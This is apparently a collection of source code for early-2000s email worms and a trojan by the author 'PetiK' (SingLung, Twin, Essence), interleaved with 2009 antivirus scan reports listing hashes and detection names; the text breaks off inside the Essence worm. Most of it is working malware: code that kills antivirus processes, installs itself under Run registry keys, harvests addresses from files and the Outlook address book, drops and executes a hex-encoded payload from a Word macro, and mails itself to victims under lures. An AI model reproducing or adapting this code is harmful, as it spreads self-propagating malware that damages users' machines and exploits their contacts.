call @wininetdll db "WININET.DLL",0 @wininetdll: call LoadLibrary test eax,eax jz send mov ebp,eax call @inetconnect db "InternetGetConnectedState",0 @inetconnect: push ebp call GetProcAddress test eax,eax jz End mov edi,eax verif: push 00h push offset Tmp call edi dec eax jnz verif push ebp call FreeLibrary send: call @mapidll db "MAPI32.DLL",0 @mapidll: call LoadLibrary test eax,eax jz End mov ebp,eax call @sendmail db "MAPISendMail",0 @sendmail: push ebp call GetProcAddress test eax,eax jz End mov edi,eax xor push push push push push call push call push call End: jmp eax,eax eax eax offset Message eax [MsgHdl] edi 5000 Sleep ebp FreeLibrary FinAsm db 50 dup (0) dd 0 dd 0 db "Pentasm99@aol.com",0 db "Trojan_PetiK, OUVRE-VITE PETIK",0 db "Encors un con ki s'est fait prendre",0dh,0ah db "Tant pis pour lui. Je peux tout voir.",0dh,0ah,0dh,0ah,0dh,0ah db 9,9,"PetiKVX (www.petikvx.fr.fm)",0 dd dd dd dd dd dd dd dd dd dd dd dd ? offset offset ? ? ? 2 offset 1 offset 1 offset

liste Tmp MsgHdl petikmail subject body

Message

subject body

MsgFrom MsgTo Attach

MsgFrom

dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd

? ? ? ? ? ? ? 1 offset petikmail offset petikmail ? ? ? ? ? offset liste ? ?

MsgTo

Attach

FinAsm: } RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_ALL_ACCESS,&hReg); RegDeleteValue(hReg,"Microsoft Setup"); RegCloseKey(hReg); } void Bienvenue() { MessageBox(NULL,"Je te souhaite une Bonne et Heureuse Nouvelle Année.\nEt tous mes meilleurs voeux.", "BONNE ANNEE !",MB_OK|MB_ICONINFORMATION); }

File Trojan_PetiK.exe received on 05.16.2009 20:10:19 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result PSW.Generic.HIF Trojan.PWS.Petilam.A Trojan.PWS.Petilam Suspicious File Trojan-PSW.Win32.Petilam Trojan.PWS.Petilam.A Trojan-PSW.Win32.Petilam PWS:Win32/Petilam probably unknown NewHeur_PE Suspicious file Trojan.PWS.Petilam.A Medium Risk Malware Trojan.Spy.Win32.Undef.GEN [Suspicious] BehavesLike.Win32.Malware (v) TROJ_PETILAM.A Win32.PSW.Petilam Trojan.PWS.Petilam.A

Additional information File size: 24064 bytes MD5...: c12a8711efbf38f0820c827f22269684 SHA1..: 2afd3a9fb4ae7af97c9618b98b87b28894fec2d2 PEiD..: UPX 2.90 [LZMA] -&gt; Markus Oberhumer, Laszlo Molnar &amp; John Reiser

/* Name : I-Worm.SingLung Author : PetiK Date : January 23rd 2002 Language : C++/Win32asm Terminate some process like AV. Copy it self to %SYSDIR%\MSGDI32.EXE Wait an internet connection Scan some HTML file to find EMail and spread with MAPI functions. Greetz to Bumblebee (I-Worm.Plage and I-Worm.Rundll); */ #include <stdio.h> #include <windows.h> #include <mapi.h> #include <tlhelp32.h> #pragma argused #pragma inline char filename[100],sysdir[100],sysdr[100],winhtm[100]; LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run", SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders"; int i; HANDLE fd,lSnapshot,myproc; BOOL rProcessFound; FILE *vbs; BYTE desktop[50],favoris[50],personal[50],cache[50]; DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris), sizpersonal=sizeof(personal),sizdesktop=sizeof(cache); DWORD type=REG_SZ; FILE *stopv; LHANDLE session; MapiMessage mess; MapiRecipDesc from; HINSTANCE hMAPI; HKEY hReg; PROCESSENTRY32 uProcess; SYSTEMTIME systime; WIN32_FIND_DATA ffile; HDC dc; void void void void void void Welcome(); StopAV(char *); FindFile(char *,char *); GetMail(char *,char *); sendmail(char *); FeedBack();

//ULONG (PASCAL FAR *RegSerPro)(ULONG, ULONG); ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG); int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow) { /* // Worm in RegisterServiceProcess HMODULE kern32=GetModuleHandle("KERNEL32.DLL"); if(kern32) { (FARPROC &)RegSerPro=GetProcAddress(kern32,"RegisterServiceProcess"); if(RegSerPro) RegSerPro(NULL,1); } */ // Fuck some AntiVirus hahahaha StopAV("AVP32.EXE"); // StopAV("AVPCC.EXE"); // StopAV("AVPM.EXE"); // StopAV("WFINDV32.EXE"); // StopAV("F-AGNT95.EXE"); // StopAV("NAVAPW32.EXE"); // StopAV("NAVW32.EXE"); // StopAV("NMAIN.EXE"); // AVP AVP AVP Dr. Solomon F-Secure Norton Antivirus Norton Antivirus Norton Antivirus

StopAV("PAVSCHED.EXE"); StopAV("ZONEALARM.EXE");

// Panda AntiVirus // ZoneAlarm

GetModuleFileName(hInst,filename,100); GetSystemDirectory((char *)sysdir,100); strcpy(sysdr,sysdir); strcat(sysdr,"\\MSGDI32.EXE"); if((lstrcmp(filename,sysdr))!=0) { Welcome(); } else { hMAPI=LoadLibrary("MAPI32.DLL"); (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail"); RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg); RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop); RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris); RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal); RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache); RegCloseKey(hReg); GetWindowsDirectory((char *)winhtm,100); _asm { call @wininet db "WININET.DLL",0 @wininet: call LoadLibrary test eax,eax jz end_asm mov ebp,eax call @inetconnect db "InternetGetConnectedState",0 @inetconnect: push ebp call GetProcAddress test eax,eax jz end_wininet mov edi,eax verf: push 0 push Tmp call edi dec eax jnz verf end_wininet: push ebp call FreeLibrary end_asm: jmp end_all_asm Tmp dd 0

end_all_asm: } FindFile(desktop,"*.htm"); FindFile(favoris,"*.ht*"); FindFile(personal,"*.ht*"); FindFile(personal,"*.doc"); FindFile(winhtm,".ht*"); FindFile(cache,".ht*"); FreeLibrary(hMAPI); FeedBack(); } strcat(sysdir,"\\MsGDI32.exe"); CopyFile(filename,sysdir,FALSE); RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg); RegSetValueEx(hReg,"Microsoft GDI 32 bits",0,REG_SZ,(BYTE *)sysdir,100); RegCloseKey(hReg); } void Welcome() {

register char fileWel[100],messWel[25],titWel[25]; strcpy(fileWel,filename); fileWel[0]=0; for(i=strlen(filename);i>0 && filename[i]!='\\';i--); wsprintf(titWel,"Error - %s",fileWel+i+1); wsprintf(messWel,"File - %s - damaged.\nCannot open this file.",fileWel+i+1); MessageBox(NULL,messWel,titWel,MB_OK|MB_ICONHAND); } void StopAV(char *antivirus) { register BOOL term; lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); uProcess.dwSize=sizeof(uProcess); rProcessFound=Process32First(lSnapshot,&uProcess); while(rProcessFound) { if(strstr(uProcess.szExeFile,antivirus)!=NULL) { // Norton Antivirus myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID); if(myproc!=NULL) { term=TerminateProcess(myproc,0); } CloseHandle(myproc); } rProcessFound=Process32Next(lSnapshot,&uProcess); } CloseHandle(lSnapshot); } void FindFile(char *folder, char *ext) { register bool abc=TRUE; register HANDLE hFile; char mail[128]; SetCurrentDirectory(folder); hFile=FindFirstFile(ext,&ffile); if(hFile!=INVALID_HANDLE_VALUE) { while(abc) { SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE); GetMail(ffile.cFileName,mail); if(strlen(mail)>0) { WritePrivateProfileString("EMail found",mail,"send","singlung.txt"); sendmail(mail); } abc=FindNextFile(hFile,&ffile); } } } void GetMail(char *namefile, char *mail) { HANDLE hf,hf2; char *mapped; DWORD size,i,k; BOOL test=FALSE,valid=FALSE; mail[0]=0; hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIV E,0); if(hf==INVALID_HANDLE_VALUE) return; size=GetFileSize(hf,NULL); if(!size) return; if(size<8) return; size-=100; hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0); if(!hf2) { CloseHandle(hf); return; } mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0); if(!mapped) {

CloseHandle(hf2); CloseHandle(hf); return; } i=0; while(i<size && !test) { if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) { test=TRUE; i+=strlen("mailto:"); k=0; while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) { if(mapped[i]!=' ') { mail[k]=mapped[i]; k++; if(mapped[i]=='@') valid=TRUE; } i++; } mail[k]=0; } else i++; } if(!valid) mail[0]=0; UnmapViewOfFile(mapped); CloseHandle(hf2); CloseHandle(hf); return; } void sendmail(char *tos) { memset(&mess,0,sizeof(MapiMessage)); memset(&from,0,sizeof(MapiRecipDesc)); from.lpszName=NULL; from.ulRecipClass=MAPI_ORIG; mess.lpszSubject="Secret for you..."; mess.lpszNoteText="Hi Friend,\n\n" "I send you my last work.\n" "Mail me if you have some suggests.\n\n" " See you soon. Best Regards."; mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc)); if(!mess.lpRecips) return; memset(mess.lpRecips,0,sizeof(MapiRecipDesc)); mess.lpRecips->lpszName=tos; mess.lpRecips->lpszAddress=tos; mess.lpRecips->ulRecipClass=MAPI_TO; mess.nRecipCount=1; mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc)); if(!mess.lpFiles) return; memset(mess.lpFiles,0,sizeof(MapiFileDesc)); mess.lpFiles->lpszPathName=filename; mess.lpFiles->lpszFileName="My_Work.exe"; mess.nFileCount=1; mess.lpOriginator=&from; mSendMail(0,0,&mess,0,0); free(mess.lpRecips); free(mess.lpFiles); } void FeedBack() { GetSystemTime(&systime); switch(systime.wDay) { case 7: MessageBox(NULL,"It is not with a B-52 that you will stop terrorist groups.\n"

"With this, you stop the life of women and children.", "Message to USA",MB_OK|MB_ICONHAND); break; case 11: dc=GetDC(NULL); if(dc) { TextOut(dc,300,300,"Can we try to stop the conflicts ? YES OF COURSE !",50); } ReleaseDC(NULL,dc); break; case 28: stopv=fopen("StopIntifada.htm","w"); fprintf(stopv,"<html><head><title>Stop Violence between Palestinians and Israeli</title></head>\n"); fprintf(stopv,"<body bgcolor=blue text=yellow>\n"); fprintf(stopv,"<p align=\"center\"><font size=\"5\">HOW TO STOP THE VIOLENCE</font></p><BR>\n"); fprintf(stopv,"<p align=\"left\"><font size=\"3\">-THE ISRAELIS:</font><BR>\n"); fprintf(stopv,"<font>To take the israelis tank out of the palestinians autonomous city.</font><BR>\n"); fprintf(stopv,"<font>Don't bomb civil place after a terrorist bomb attack.</font><BR>\n"); fprintf(stopv,"<font>To arrest and to kill the leaders of terrorist groups.</font><BR><BR>\n"); fprintf(stopv,"<font>-THE PALESTINIANS:</font><BR>\n"); fprintf(stopv,"<font>To stop to provoke the israelis army.</font><BR>\n"); fprintf(stopv,"<font>To stop the terrorist attacks.</font><BR><BR>\n"); fprintf(stopv,"<font>-THE BOTH:</font><BR>\n"); fprintf(stopv,"<font>To try to accept the other people.</font><BR>\n"); fprintf(stopv,"<font>TO ORGANIZE A MEETING BETWEEN ARIEL SHARON AND YASSER ARAFAT ! </font><BR><BR>\n"); fprintf(stopv,"<font>Thanx to read this.</font></p>\n"); fprintf(stopv,"</body></html>"); fclose(stopv); ShellExecute(NULL,"open","StopIntifada.htm",NULL,NULL,SW_SHOWMAXIMIZED); break; } }

File SingLung.exe received on 05.16.2009 19:40:32 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Email-Worm.Win32.Stopin!IK Win32/Stopin.worm.29184 Worm/Stopin.A Worm/Win32.Stopin Win32:Stopin I-Worm/Stopin Win32.StopIn.A@mm I-Worm.Stopin.a W32.Stopin.b Worm.Win32.Stopin.B Win32.HLLM.Stopin.60928 Win32.Stopin.a Win32/Stopin.B Email-Worm.Win32.Stopin.a W32/Stopin.B Win32.StopIn.A@mm Email-Worm.Win32.Stopin Email-Worm.Win32.Stopin.a Email-Worm.Win32.Stopin.a W32/Stopin.b@MM W32/Stopin.b@MM Worm.Stopin.A Worm:Win32/Petick.W@mm Win32/Stopin.B W32/Stopin.A Worm/W32.Stopin.29184 W32/Stopin.A I-Worm.Stopin.A Medium Risk Malware Worm.Singlung.a W32/Stopin-A Email-Worm.Win32.Stopin.a W95.Pet_Tick.gen W32/Stopin.a PAK_Generic.001 Win32.HLLW.Stopin I-Worm.Win32.Stopin I-Worm.Stopin.A

Additional information File size: 29184 bytes MD5...: 460f48b7d7bde2517c1a9a9042682f28 SHA1..: f6ced460439e443aa957c2765328f3b99dcdd252 PEiD..: UPX 2.90 [LZMA] -&gt; Markus Oberhumer, Laszlo Molnar &amp; John Reiser

' ' ' ' '

Name : W97M-W32.Twin Author : PetiK Language : VBA Word & Assembler Date : 01/02/2002 Size : 2701 byte

Attribute VBA_ModuleType=VBAModule Sub twin Sub AutoOpen() win = Environ("windir") thisfile = ActiveDocument.Name full = ActiveDocument.FullName MsgBox "This file has some problems", vbCritical, thisfile e e e e e = = = = = "exe=""" e + "4D5A50000200000..." e + "000...000000000000" e + "0000000000" e + """"

f = "fso.CopyFile """ f = f + full f = f + """, win&""\NetInfo.doc""" Open "C:\Twin.vbs" For Output As #1 Print #1, "On Error Resume Next" Print #1, "Set fso=CreateObject(""Scripting.FileSystemObject"")" Print #1, "Set w=CreateObject(""WScript.Shell"")" Print #1, "Set win=fso.GetSpecialFolder(0)" Print #1, "Set Twin=CreateObject(""Outlook.Application"")" Print #1, "Set deux=Twin.GetNameSpace(""MAPI"")" Print #1, "Set c=fso.CreateTextFile(""C:\backup.win"")" Print #1, "c.Close" Print #1, "For Each polux In deux.AddressLists" Print #1, "If polux.AddressEntries.Count <> 0 Then" Print #1, "For jumeaux = 1 To polux.AddressEntries.Count" Print #1, "Set castor = polux.AddressEntries(jumeaux)" Print #1, "Set c=fso.OpenTextFile(""C:\backup.win"",8,true)" Print #1, "c.WriteLine castor.Address" Print #1, "c.Close" Print #1, "Next" Print #1, "End If" Print #1, "Next" Print #1, "Set c=fso.OpenTextFile(""C:\backup.win"",8,true)" Print #1, "c.WriteLine ""#""" Print #1, "c.Close" Print #1, "" Print #1, e Print #1, "lire=decr(exe)" Print #1, "Set exfile=fso.CreateTextFile(win&""\AVW32.exe"",true)" Print #1, "exfile.Write lire" Print #1, "exfile.Close" Print #1, f Print #1, "w.Run win&""\AVW32.exe"", 1, False" Print #1, "Function decr(octet)" Print #1, "For hexa = 1 To Len(octet) Step 2" Print #1, "decr = decr & Chr(""&h"" & Mid(octet, hexa, 2))" Print #1, "Next" Print #1, "End Function" Close #1 Shell "wscript C:\Twin.vbs", vbHide End Sub Sub HelpAbout() With Application.Assistant .Visible = True End With With Assistant.NewBalloon .Text = "Message for " & Application.UserName & vbCrLf & "How Are You" .Heading = "W97M/W32ASM.Twin.Worm" .Animation = msoAnimationSendingMail .Button = msoButtonSetOK .Show End With End Sub

End Sub W32 ASM CODE OF THE HEX FILE INTO WORD DOCUMENT comment # Name : I-Worm.Twin Author : PetiK Date : January 30th 2002 - February 1st 2002 Size : 6656 bytes Action : See yourself. It's not complex. # .586p .model flat .code JUMPS api macro a extrn a:proc call a endm include useful.inc include myinclude.inc start: mov push push api push 50 esi,offset orig_worm esi 0 GetModuleFileNameA

push 25 push esi push 1 @pushsz "AntiVirus Freeware" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h api SHSetValueA @pushsz "C:\twin.vbs" api DeleteFileA push 50 push offset pathname api GetWindowsDirectoryA @pushsz "\NetInfo.doc" push offset pathname api lstrcat verif_inet: push push api dec jnz 0 offset inet InternetGetConnectedState eax verif_inet

push 0 push 0 push 3 push 0 push 1 push 80000000h @pushsz "C:\backup.win" api CreateFileA inc eax je end_worm dec eax xchg ebx,eax push push push push push push 0 0 0 2 0 ebx

api test je xchg push push push push push api test je xchg push push api cmp jbe

CreateFileMappingA eax,eax end_w1 eax,ebp 0 0 0 4 ebp MapViewOfFile eax,eax end_w2 eax,esi 0 ebx GetFileSize eax,3 end_w3

scan_mail: xor edx,edx mov edi,offset mail_addr push edi p_c: lodsb cmp al," " je car_s cmp al,0dh je entr1 cmp al,0ah je entr2 cmp al,"#" je f_mail cmp al,'@' jne not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c entr1: xor al,al stosb pop edi test edx,edx je scan_mail call send_mail jmp scan_mail entr2: xor al,al stosb pop edi jmp scan_mail f_mail: end_w3: api end_w2: api end_w1: api end_worm: push api send_mail: xor push push push push push api ret .data orig_worm push esi UnmapViewOfFile push ebp CloseHandle push ebx CloseHandle

0 ExitProcess eax,eax eax eax offset Message eax [sess] MAPISendMail

db 50 dup (0)

pathname mail_addr inet sess subject body filename Message

db db dd dd

50 dup (0) 128 dup (?) 0 0

db "A comical story for you.",0 db "I send you a comical story found on the Net.",0dh,0ah,0dh,0ah db 9,"Best Regards. You friend.",0 db "comical_story.doc",0 dd dd dd dd dd dd dd dd dd dd dd dd ? offset subject offset body ? ? ? 2 offset MsgFrom 1 offset MsgTo 1 offset Attach dd ? dd dd dd dd dd ? ? ? ? ? ? 1 offset mail_addr offset mail_addr ? ? dd ? ? ? offset pathname offset filename ?

MsgFrom

MsgTo

dd dd dd dd dd dd dd dd dd dd dd

Attach

end start end MODULE VBA TWIN IN WORD DOCUMENT

File Twin.exe received on 05.16.2009 19:41:08 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Email-Worm.Win32.Petik!IK Win32/Comical.worm.6656 Worm/Petik.AV.10 Worm/Win32.Win32 W32/Malware!2f2b Win32:Comical W97M/Comical.EXE Win32.Comical.A@mm I-Worm.Petik Worm.Win32.Comical.A Win32.Petik.8192 Suspicious File Win32/Comical.A W32/Malware!2f2b Email-Worm.Win32.Petik W32/Petik.PL@mm Win32.Comical.A@mm Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/Comical@MM W32/Comical@MM Worm.Petik.AV.10 Worm:Win32/Comical.A@mm Win32/Comical.A W32/Petik.AR Worm/W32.Petik.6656.B Worm Generic I-Worm.Conical.A High Risk Worm Worm.Mail.Petik.h W32/Comical-A W32.Comical@mm W32.Comical@mm W32/Comical@MM WORM_COMICAL.A Win32.Worm.Twin I-Worm.Conical.A

Additional information File size: 6656 bytes MD5...: 3da254ab9def856d64f0779ea6a6057f SHA1..: 31a005985a793d2b8e84dd747c3fa17c721ddf60 PEiD..: UPX 2.90 [LZMA] -&gt; Markus Oberhumer, Laszlo Molnar &amp; John Reiser

File Twin.doc received on 05.16.2009 19:41:06 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Email-Worm.Win32.Petik!IK W97M/Comical W2000M/Comical.A@mm Worm/Win32.Petik W97M/Comical.A@mm MW97:Comical-A W97M/Comical Win32.Comical.A(W97M) Unclassified Malware W97M.Petik O97M.GNsm W97M/Comical.A:mm W97M/Comical.A@mm Email-Worm.Win32.Petik W97M/Comical.A@mm Win32.Comical. Email-Worm.Win32.Petik Macro.Comical Email-Worm.Win32.Petik W97M/Comical@MM W97M/Comical@MM Macro.Comical.A Virus:W97M/Comical.A@mm W97M/Comical.A W97M/Comical.A@mm Win32.Comical.A(W97M) W97M/Generic WORD.97.Conical.A Unknown Micro Virus WM97/Comical-A W97M.Comical@mm W97M_COMICAL.A Virus.W97M.Petik W97M.Comical.A WORD.97.Conical.A

Additional information File size: 65536 bytes MD5...: 079275bdaf0058642f3b062b3aef4de3 SHA1..: 0fe4a31077176828ec545b7ca3c5e92ea59a7352 SHA256: 46a11a3b520a234a4408010d57a0bd28589526f3248e16fc71ccf4cf8db31595

/* Name : I-Worm.Essence Author : PetiK Date : February 3rd 2002 Language : C++ Thanx to Bumblebee. */ #include <windows.h> #include <mapi.h> #include <memory.h> #pragma argused void Welcome(); void attachname(); void sendmail(LHANDLE sess, char *msubject, char *mbody, char *mailaddr); char filename[100],sysdir[100],sysdr[100],attname[20]; LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run"; HINSTANCE LHANDLE MapiMessage char char hMAPI; sess; *mess; messId[512]; subject[1024], address[1024], server[1024], body[8192]; i,j; *tmp; msg; hReg; (PASCAL (PASCAL (PASCAL (PASCAL (PASCAL (PASCAL (PASCAL FAR FAR FAR FAR FAR FAR FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG); *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG); *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE); *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR); *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *); *mSaveMail)(LHANDLE, ULONG, lpMapiMessage, FLAGS, ULONG, LPTSTR); *mFreeBuffer)(LPVOID);

long char MSG HKEY ULONG ULONG ULONG ULONG ULONG ULONG ULONG

int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow) { GetModuleFileName(hInst,filename,100); GetSystemDirectory((char *)sysdir,100); strcpy(sysdr,sysdir); strcat(sysdr,"\\MSIE32.EXE"); if((lstrcmp(filename,sysdr))!=0) { Welcome(); strcat(sysdir,"\\Msie32.exe"); CopyFile(filename,sysdir,FALSE); RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg); RegSetValueEx(hReg,"Microsoft IE",0,REG_SZ,(BYTE *)sysdir,100); RegCloseKey(hReg); // WriteProfileString("WINDOWS","RUN",sysdir); // WriteProfileString(NULL,NULL,NULL); return 0; } hMAPI=LoadLibrary("MAPI32.DLL"); if(!hMAPI) return -1; (FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon"); if(!mLogon) return -1; (FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff"); if(!mLogoff) return -1; (FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext"); if(!mFindNext) return -1; (FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");

if(!mReadMail) return -1; (FARPROC &)mSaveMail=GetProcAddress(hMAPI, "MAPISaveMail"); if(!mSaveMail) return -1; (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail"); if(!mSendMail) return -1; (FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer"); if(!mFreeBuffer) return -1; mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&sess); SetThreadPriority(NULL,THREAD_PRIORITY_LOWEST); while(GetMessage(&msg,NULL,0,0)) if(mFindNext(sess,0,NULL,NULL,MAPI_LONG_MSGID| MAPI_UNREAD_ONLY,NULL,messId)==SUCCESS_SUCCESS) { do { if(mReadMail(sess,NULL,messId,MAPI_ENVELOPE_ONLY| MAPI_PEEK,NULL,&mess)==SUCCESS_SUCCESS) { if(lstrlen(mess->lpszSubject)>2) if(mess->lpszSubject[strlen(mess->lpszSubject)-1]!=' ' && mess>lpszSubject[strlen(mess->lpszSubject)-2]!=' ') { mFreeBuffer(mess); SetThreadPriority(NULL,THREAD_PRIORITY_HIGHEST); if(mReadMail(sess,NULL,messId,MAPI_SUPPRESS_ATTACH| MAPI_PEEK,NULL,&mess)==SUCCESS_SUCCESS) { body[0]=0; if(mess->lpszNoteText) { wsprintf(body,"Hi 